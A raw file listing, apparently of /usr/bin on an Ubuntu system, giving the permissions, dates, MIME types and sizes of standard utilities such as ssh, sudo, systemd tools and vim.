-rwxr-xr-x
2026-07-03 01:05:05
select-editor
text/x-shellscript
2.39 KB
-rwxr-xr-x
2021-08-29 05:44:44
sensible-browser
text/x-shellscript
1.26 KB
-rwxr-xr-x
2021-08-29 05:44:44
sensible-editor
text/x-shellscript
1.24 KB
-rwxr-xr-x
2021-08-29 05:44:44
sensible-pager
text/x-shellscript
565 B
-rwxr-xr-x
2021-08-29 05:44:44
seq
application/x-pie-executable
46.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
setarch
application/x-pie-executable
26.65 KB
-rwxr-xr-x
2026-03-06 04:10:04
setfont
application/x-pie-executable
50.32 KB
-rwxr-xr-x
2022-12-16 02:14:33
setkeycodes
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
setleds
application/x-pie-executable
18.21 KB
-rwxr-xr-x
2022-12-16 02:14:33
setlogcons
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
setmetamode
application/x-pie-executable
14.26 KB
-rwxr-xr-x
2022-12-16 02:14:33
setpci
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2021-08-30 02:45:58
setpriv
application/x-pie-executable
38.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
setsid
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
setterm
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
setupcon
text/x-shellscript
38.31 KB
-rwxr-xr-x
2021-11-22 04:39:53
sftp
application/x-pie-executable
146.66 KB
-rwxr-xr-x
2026-07-09 06:38:00
sg
application/x-pie-executable
39.55 KB
-rwsr-xr-x
2024-02-06 12:54:23
sg_bg_ctl
application/x-pie-executable
14.51 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_compare_and_write
application/x-pie-executable
26.91 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_copy_results
application/x-pie-executable
23.3 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_dd
application/x-pie-executable
54.33 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_decode_sense
application/x-pie-executable
14.76 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_emc_trespass
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_format
application/x-pie-executable
39.35 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_get_config
application/x-pie-executable
35.39 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_get_elem_status
application/x-pie-executable
26.79 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_get_lba_status
application/x-pie-executable
22.95 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_ident
application/x-pie-executable
14.6 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_inq
application/x-pie-executable
119.61 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_logs
application/x-pie-executable
150.93 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_luns
application/x-pie-executable
22.79 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_map
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_map26
application/x-pie-executable
26.7 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_modes
application/x-pie-executable
46.08 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_opcodes
application/x-pie-executable
35.01 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_persist
application/x-pie-executable
36.08 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_prevent
application/x-pie-executable
14.51 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_raw
application/x-pie-executable
26.91 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_rbuf
application/x-pie-executable
22.73 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_rdac
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_read
application/x-pie-executable
26.31 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_read_attr
application/x-pie-executable
36.65 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_read_block_limits
application/x-pie-executable
14.54 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_read_buffer
application/x-pie-executable
27.56 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_read_long
application/x-pie-executable
14.7 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_readcap
application/x-pie-executable
22.79 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_reassign
application/x-pie-executable
14.66 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_referrals
application/x-pie-executable
14.66 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_rep_pip
application/x-pie-executable
14.57 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_rep_zones
application/x-pie-executable
26.8 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_requests
application/x-pie-executable
22.76 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_reset
application/x-pie-executable
14.66 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_reset_wp
application/x-pie-executable
14.6 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_rmsn
application/x-pie-executable
14.51 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_rtpg
application/x-pie-executable
14.6 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_safte
application/x-pie-executable
22.7 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_sanitize
application/x-pie-executable
27.01 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_sat_identify
application/x-pie-executable
18.73 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_sat_phy_event
application/x-pie-executable
19.01 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_sat_read_gplog
application/x-pie-executable
18.73 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_sat_set_features
application/x-pie-executable
18.7 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_scan
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_seek
application/x-pie-executable
18.88 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_senddiag
application/x-pie-executable
27.2 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_ses
application/x-pie-executable
119.97 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_ses_microcode
application/x-pie-executable
27.36 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_start
application/x-pie-executable
18.85 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_stpg
application/x-pie-executable
22.73 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_stream_ctl
application/x-pie-executable
18.7 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_sync
application/x-pie-executable
14.66 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_test_rwbuf
application/x-pie-executable
18.6 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_timestamp
application/x-pie-executable
18.83 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_turs
application/x-pie-executable
26.7 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_unmap
application/x-pie-executable
22.76 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_verify
application/x-pie-executable
18.91 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_vpd
application/x-pie-executable
114.42 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_wr_mode
application/x-pie-executable
22.73 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_write_buffer
application/x-pie-executable
27.23 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_write_long
application/x-pie-executable
14.76 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_write_same
application/x-pie-executable
26.95 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_write_verify
application/x-pie-executable
26.79 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_write_x
application/x-pie-executable
55.6 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_xcopy
application/x-pie-executable
42.32 KB
-rwxr-xr-x
2023-03-22 02:57:45
sg_zone
application/x-pie-executable
14.86 KB
-rwxr-xr-x
2023-03-22 02:57:45
sginfo
application/x-pie-executable
72.01 KB
-rwxr-xr-x
2023-03-22 02:57:45
sgitopnm
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
sgm_dd
application/x-pie-executable
38.31 KB
-rwxr-xr-x
2023-03-22 02:57:45
sgp_dd
application/x-pie-executable
46.31 KB
-rwxr-xr-x
2023-03-22 02:57:45
sh
application/x-pie-executable
122.74 KB
-rwxr-xr-x
2022-03-23 01:49:23
sha1sum
application/x-pie-executable
42.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
sha224sum
application/x-pie-executable
50.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
sha256sum
application/x-pie-executable
50.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
sha384sum
application/x-pie-executable
58.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
sha512sum
application/x-pie-executable
58.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
shasum
text/x-perl
9.75 KB
-rwxr-xr-x
2026-06-23 08:11:00
showconsolefont
application/x-pie-executable
18.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
showkey
application/x-pie-executable
18.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
shred
application/x-pie-executable
50.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
shuf
application/x-pie-executable
46.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
sirtopnm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
size
application/x-pie-executable
30.45 KB
-rwxr-xr-x
2025-12-03 03:08:01
skill
application/x-pie-executable
30.23 KB
-rwxr-xr-x
2023-10-31 11:36:04
slabtop
application/x-pie-executable
22.23 KB
-rwxr-xr-x
2023-10-31 11:36:04
sldtoppm
application/x-pie-executable
18.09 KB
-rwxr-xr-x
2021-02-07 06:32:35
sleep
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
slogin
application/x-pie-executable
827.04 KB
-rwxr-xr-x
2026-07-09 06:38:00
snap
application/x-pie-executable
20.59 MB
-rwxr-xr-x
2026-07-10 11:48:41
snapctl
application/x-executable
7.21 MB
-rwxr-xr-x
2026-07-10 11:48:41
snapfuse
application/x-pie-executable
38.23 KB
-rwxr-xr-x
2026-07-10 11:48:41
snice
application/x-pie-executable
30.23 KB
-rwxr-xr-x
2023-10-31 11:36:04
soelim
application/x-pie-executable
30.48 KB
-rwxr-xr-x
2022-03-23 01:56:30
sort
application/x-pie-executable
98.8 KB
-rwxr-xr-x
2026-01-23 10:51:17
sos
text/x-script.python
612 B
-rwxr-xr-x
2025-12-19 05:58:00
sos-collector
text/x-script.python
1.04 KB
-rwxr-xr-x
2025-11-06 09:44:58
sosreport
text/x-script.python
1.03 KB
-rwxr-xr-x
2025-11-06 09:44:58
sotruss
text/x-shellscript
4.21 KB
-rwxr-xr-x
2026-07-24 12:11:17
spctoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
splain
text/x-perl
18.96 KB
-rwxr-xr-x
2026-06-23 08:11:00
split
application/x-pie-executable
50.97 KB
-rwxr-xr-x
2026-01-23 10:51:17
splitfont
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2022-12-16 02:14:33
sprof
application/x-pie-executable
34.37 KB
-rwxr-xr-x
2026-07-24 12:11:17
sputoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
sqfscat
application/x-pie-executable
131.9 KB
-rwxr-xr-x
2022-03-25 09:58:38
sqfstar
application/x-pie-executable
254.68 KB
-rwxr-xr-x
2022-03-25 09:58:38
ss
application/x-pie-executable
125.07 KB
-rwxr-xr-x
2026-04-15 07:15:26
ssh
application/x-pie-executable
827.04 KB
-rwxr-xr-x
2026-07-09 06:38:00
ssh-add
application/x-pie-executable
166.42 KB
-rwxr-xr-x
2026-07-09 06:38:00
ssh-agent
application/x-pie-executable
286.43 KB
-rwxr-sr-x
2026-07-09 06:38:00
ssh-argv0
text/x-shellscript
1.42 KB
-rwxr-xr-x
2024-07-10 10:17:07
ssh-copy-id
text/x-shellscript
12.38 KB
-rwxr-xr-x
2022-02-23 11:31:11
ssh-import-id
text/x-script.python
985 B
-rwxr-xr-x
2021-02-11 03:34:06
ssh-import-id-gh
text/x-shellscript
785 B
-rwxr-xr-x
2020-12-07 07:19:36
ssh-import-id-lp
text/x-shellscript
785 B
-rwxr-xr-x
2020-12-07 07:19:36
ssh-keygen
application/x-pie-executable
446.44 KB
-rwxr-xr-x
2026-07-09 06:38:00
ssh-keyscan
application/x-pie-executable
190.44 KB
-rwxr-xr-x
2026-07-09 06:38:00
st4topgm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
stat
application/x-pie-executable
78.52 KB
-rwxr-xr-x
2026-01-23 10:51:17
static-sh
application/x-executable
2.09 MB
-rwxr-xr-x
2024-08-13 01:39:23
stdbuf
application/x-pie-executable
42.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
strace
application/x-pie-executable
1.88 MB
-rwxr-xr-x
2022-02-16 09:37:21
strace-log-merge
text/x-shellscript
1.78 KB
-rwxr-xr-x
2021-02-16 08:00:00
stream
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
stream-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
stream-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
streamzip
text/x-perl
7.75 KB
-rwxr-xr-x
2026-06-23 08:11:00
strings
application/x-pie-executable
30.61 KB
-rwxr-xr-x
2025-12-03 03:08:01
strip
application/x-pie-executable
162.57 KB
-rwxr-xr-x
2025-12-03 03:08:01
stty
application/x-pie-executable
74.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
su
application/x-pie-executable
54.38 KB
-rwsr-xr-x
2026-03-06 04:10:04
sudo
application/x-pie-executable
226.97 KB
-rwsr-xr-x
2026-03-02 01:08:06
sudoedit
application/x-pie-executable
226.97 KB
-rwsr-xr-x
2026-03-02 01:08:06
sudoreplay
application/x-pie-executable
87.64 KB
-rwxr-xr-x
2026-03-02 01:08:06
sum
application/x-pie-executable
34.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
sync
application/x-pie-executable
34.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
systemctl
application/x-pie-executable
1.06 MB
-rwxr-xr-x
2026-06-05 03:40:28
systemd
application/x-pie-executable
1.76 MB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-analyze
application/x-pie-executable
1.73 MB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-ask-password
application/x-pie-executable
18.48 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-cat
application/x-pie-executable
18.38 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-cgls
application/x-pie-executable
22.48 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-cgtop
application/x-pie-executable
38.39 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-cryptenroll
application/x-pie-executable
50.53 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-delta
application/x-pie-executable
26.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-detect-virt
application/x-pie-executable
18.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-escape
application/x-pie-executable
22.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-hwdb
application/x-pie-executable
118.66 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-id128
application/x-pie-executable
26.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-inhibit
application/x-pie-executable
22.39 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-machine-id-setup
application/x-pie-executable
18.48 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-mount
application/x-pie-executable
50.59 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-notify
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-path
application/x-pie-executable
18.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-run
application/x-pie-executable
62.57 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-socket-activate
application/x-pie-executable
26.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-stdio-bridge
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-sysext
application/x-pie-executable
46.49 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-sysusers
application/x-pie-executable
62.68 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-tmpfiles
application/x-pie-executable
98.57 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-tty-ask-password-agent
application/x-pie-executable
34.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
systemd-umount
application/x-pie-executable
50.59 KB
-rwxr-xr-x
2026-06-05 03:40:28
tabs
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2026-06-30 09:25:30
tac
application/x-pie-executable
98.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
tail
application/x-pie-executable
66.52 KB
-rwxr-xr-x
2026-01-23 10:51:17
tar
application/x-pie-executable
509.81 KB
-rwxr-xr-x
2026-07-20 02:42:36
taskset
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
tbl
application/x-pie-executable
126.48 KB
-rwxr-xr-x
2022-03-23 01:56:30
tclsh
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2022-03-25 09:58:49
tclsh8.6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2022-03-25 09:58:49
tcpdump
application/x-pie-executable
1.27 MB
-rwxr-xr-x
2024-02-08 01:21:43
tee
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
telnet
application/x-pie-executable
107.56 KB
-rwxr-xr-x
2022-03-24 04:20:51
telnet.netkit
application/x-pie-executable
107.56 KB
-rwxr-xr-x
2022-03-24 04:20:51
tempfile
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2022-03-23 01:49:54
test
application/x-pie-executable
42.44 KB
-rwxr-xr-x
2026-01-23 10:51:17
tgatoppm
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
thinkjettopbm
application/x-pie-executable
22.03 KB
-rwxr-xr-x
2021-02-07 06:32:35
tic
application/x-pie-executable
86.41 KB
-rwxr-xr-x
2026-06-30 09:25:30
tifftopnm
application/x-pie-executable
26.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
time
application/x-pie-executable
26.52 KB
-rwxr-xr-x
2022-03-25 09:52:22
timedatectl
application/x-pie-executable
46.37 KB
-rwxr-xr-x
2026-06-05 03:40:28
timeout
application/x-pie-executable
38.95 KB
-rwxr-xr-x
2026-01-23 10:51:17
tkconch3
text/x-script.python
962 B
-rwxr-xr-x
2026-05-22 03:02:45
tload
application/x-pie-executable
18.24 KB
-rwxr-xr-x
2023-10-31 11:36:04
tmux
application/x-pie-executable
948.55 KB
-rwxr-xr-x
2023-01-31 01:27:15
tnftp
application/x-pie-executable
178.9 KB
-rwxr-xr-x
2022-03-25 10:01:15
toe
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2026-06-30 09:25:30
top
application/x-pie-executable
130.06 KB
-rwxr-xr-x
2023-10-31 11:36:04
touch
application/x-pie-executable
90.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
tput
application/x-pie-executable
26.34 KB
-rwxr-xr-x
2026-06-30 09:25:30
tr
application/x-pie-executable
46.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
tracepath
application/x-pie-executable
18.15 KB
-rwxr-xr-x
2025-07-24 11:51:44
trial3
text/x-script.python
958 B
-rwxr-xr-x
2026-05-22 03:02:45
troff
application/x-pie-executable
718.61 KB
-rwxr-xr-x
2022-03-23 01:56:30
true
application/x-pie-executable
26.3 KB
-rwxr-xr-x
2026-01-23 10:51:17
truncate
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
tset
application/x-pie-executable
26.31 KB
-rwxr-xr-x
2026-06-30 09:25:30
tsort
application/x-pie-executable
46.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
tty
application/x-pie-executable
30.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
twist3
text/x-script.python
958 B
-rwxr-xr-x
2026-05-22 03:02:45
twistd3
text/x-script.python
960 B
-rwxr-xr-x
2026-05-22 03:02:45
tzselect
text/x-shellscript
15.02 KB
-rwxr-xr-x
2026-07-24 12:11:17
ua
text/x-script.python
1003 B
-rwxr-xr-x
2026-07-06 01:36:19
ubuntu-advantage
text/x-script.python
1003 B
-rwxr-xr-x
2026-07-06 01:36:19
ubuntu-bug
text/x-shellscript
2.51 KB
-rwxr-xr-x
2024-07-10 11:56:21
ubuntu-distro-info
application/x-pie-executable
22.89 KB
-rwxr-xr-x
2023-11-28 12:18:32
ubuntu-drivers
text/x-script.python
18.53 KB
-rwxr-xr-x
2025-12-10 09:16:48
ubuntu-security-status
text/x-script.python
22.25 KB
-rwxr-xr-x
2024-07-11 09:48:43
ucf
text/x-shellscript
40.9 KB
-rwxr-xr-x
2020-06-16 05:37:53
ucfq
text/x-perl
18.91 KB
-rwxr-xr-x
2020-06-16 05:37:53
ucfr
text/x-shellscript
10.47 KB
-rwxr-xr-x
2020-06-16 05:37:53
uclampset
application/x-pie-executable
26.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
udevadm
application/x-pie-executable
1.08 MB
-rwxr-xr-x
2026-06-05 03:40:28
udisksctl
application/x-pie-executable
58.38 KB
-rwxr-xr-x
2025-08-21 02:17:01
ul
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
umount
application/x-pie-executable
34.38 KB
-rwsr-xr-x
2026-03-06 04:10:04
uname
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
unattended-upgrade
text/x-script.python
97.21 KB
-rwxr-xr-x
2022-01-14 10:25:41
unattended-upgrades
text/x-script.python
97.21 KB
-rwxr-xr-x
2022-01-14 10:25:41
uncompress
text/x-shellscript
2.29 KB
-rwxr-xr-x
2026-07-03 11:55:53
unexpand
application/x-pie-executable
34.53 KB
-rwxr-xr-x
2026-01-23 10:51:17
unicode_start
text/x-shellscript
2.7 KB
-rwxr-xr-x
2022-12-16 02:14:33
unicode_stop
text/x-shellscript
530 B
-rwxr-xr-x
2022-12-16 02:14:33
uniq
application/x-pie-executable
42.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
unlink
application/x-pie-executable
30.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
unlzma
application/x-pie-executable
82.52 KB
-rwxr-xr-x
2026-05-28 04:06:40
unmkinitramfs
text/x-shellscript
3.69 KB
-rwxr-xr-x
2024-03-19 12:05:17
unshare
application/x-pie-executable
30.6 KB
-rwxr-xr-x
2026-03-06 04:10:04
unsquashfs
application/x-pie-executable
131.9 KB
-rwxr-xr-x
2022-03-25 09:58:38
unxz
application/x-pie-executable
82.52 KB
-rwxr-xr-x
2026-05-28 04:06:40
unzip
application/x-pie-executable
170.42 KB
-rwxr-xr-x
2024-02-01 03:52:55
unzipsfx
application/x-pie-executable
78.42 KB
-rwxr-xr-x
2024-02-01 03:52:55
unzstd
application/x-pie-executable
854.59 KB
-rwxr-xr-x
2022-03-24 04:15:58
update-alternatives
application/x-pie-executable
58.24 KB
-rwxr-xr-x
2025-09-09 08:09:16
update-mime-database
application/x-pie-executable
58.23 KB
-rwxr-xr-x
2022-01-14 09:18:27
upower
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2022-03-09 06:59:13
uptime
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2023-10-31 11:36:04
usb-devices
text/x-shellscript
4.33 KB
-rwxr-xr-x
2022-03-25 09:53:09
usbhid-dump
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2022-03-25 09:53:09
usbreset
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2022-03-25 09:53:09
users
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
utmpdump
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
uuidgen
application/x-pie-executable
18.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
uuidparse
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
vcs-run
text/x-shellscript
6.75 KB
-rwxr-xr-x
2021-08-05 09:58:37
vdir
application/x-pie-executable
134.98 KB
-rwxr-xr-x
2026-01-23 10:51:17
vi
application/x-pie-executable
3.61 MB
-rwxr-xr-x
2026-07-13 07:08:21
view
application/x-pie-executable
3.61 MB
-rwxr-xr-x
2026-07-13 07:08:21
vigpg
text/x-shellscript
2.58 KB
-rwxr-xr-x
2020-02-17 02:11:50
vim
application/x-pie-executable
3.61 MB
-rwxr-xr-x
2026-07-13 07:08:21
vim.basic
application/x-pie-executable
3.61 MB
-rwxr-xr-x
2026-07-13 07:08:21
vim.tiny
application/x-pie-executable
1.45 MB
-rwxr-xr-x
2026-07-13 07:08:21
vimdiff
application/x-pie-executable
3.61 MB
-rwxr-xr-x
2026-07-13 07:08:21
vimtutor
text/x-shellscript
2.1 KB
-rwxr-xr-x
2026-07-13 07:08:21
vm-support
text/x-shellscript
9.83 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmhgfs-fuse
application/x-pie-executable
46.73 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmstat
application/x-pie-executable
38.24 KB
-rwxr-xr-x
2023-10-31 11:36:04
vmtoolsd
application/x-pie-executable
74.56 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmware-alias-import
application/x-pie-executable
42.52 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmware-checkvm
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmware-hgfsclient
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmware-namespace-cmd
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmware-rpctool
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmware-toolbox-cmd
application/x-pie-executable
58.59 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmware-vgauth-cmd
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmware-vmblock-fuse
application/x-pie-executable
18.78 KB
-rwxr-xr-x
2025-09-23 04:05:34
vmware-xferlogs
application/x-pie-executable
32.33 KB
-rwxr-xr-x
2025-09-23 04:05:34
w
application/x-pie-executable
22.23 KB
-rwxr-xr-x
2023-10-31 11:36:04
wall
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
watch
application/x-pie-executable
26.6 KB
-rwxr-xr-x
2023-10-31 11:36:04
watchgnupg
application/x-pie-executable
18.3 KB
-rwxr-xr-x
2026-01-05 10:14:39
wbmptopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
wc
application/x-pie-executable
42.42 KB
-rwxr-xr-x
2026-01-23 10:51:17
wdctl
application/x-pie-executable
30.4 KB
-rwxr-xr-x
2026-03-06 04:10:04
webmin
text/x-perl
13.29 KB
-rwxr-xr-x
2026-07-26 11:58:26
wget
application/x-pie-executable
459.02 KB
-rwxr-xr-x
2026-07-16 04:38:47
whatis
application/x-pie-executable
47.28 KB
-rwxr-xr-x
2022-03-17 07:03:00
whereis
application/x-pie-executable
30.84 KB
-rwxr-xr-x
2026-03-06 04:10:04
which
text/x-shellscript
946 B
-rwxr-xr-x
2022-03-23 01:49:54
which.debianutils
text/x-shellscript
946 B
-rwxr-xr-x
2022-03-23 01:49:54
whiptail
application/x-pie-executable
30.16 KB
-rwxr-xr-x
2022-03-17 07:30:58
who
application/x-pie-executable
50.52 KB
-rwxr-xr-x
2026-01-23 10:51:17
whoami
application/x-pie-executable
30.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
wifi-status
text/x-shellscript
2.06 KB
-rwxr-xr-x
2020-02-17 02:11:50
winicontoppm
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
write
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
write.ul
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
www-browser
application/x-pie-executable
1.89 MB
-rwxr-xr-x
2021-10-28 02:31:20
x86_64
application/x-pie-executable
26.65 KB
-rwxr-xr-x
2026-03-06 04:10:04
x86_64-linux-gnu-addr2line
application/x-pie-executable
26.7 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-ar
application/x-pie-executable
54.48 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-as
application/x-pie-executable
456.4 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-c++filt
application/x-pie-executable
22.27 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-cpp
application/x-executable
906.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-cpp-11
application/x-executable
906.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-dwp
application/x-pie-executable
1.82 MB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-elfedit
application/x-pie-executable
34.72 KB
-rwxr-xr-x
2025-12-03 03:08:01
x86_64-linux-gnu-g++
application/x-executable
910.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
x86_64-linux-gnu-g++-11
application/x-executable
910.82 KB
-rwxr-xr-x
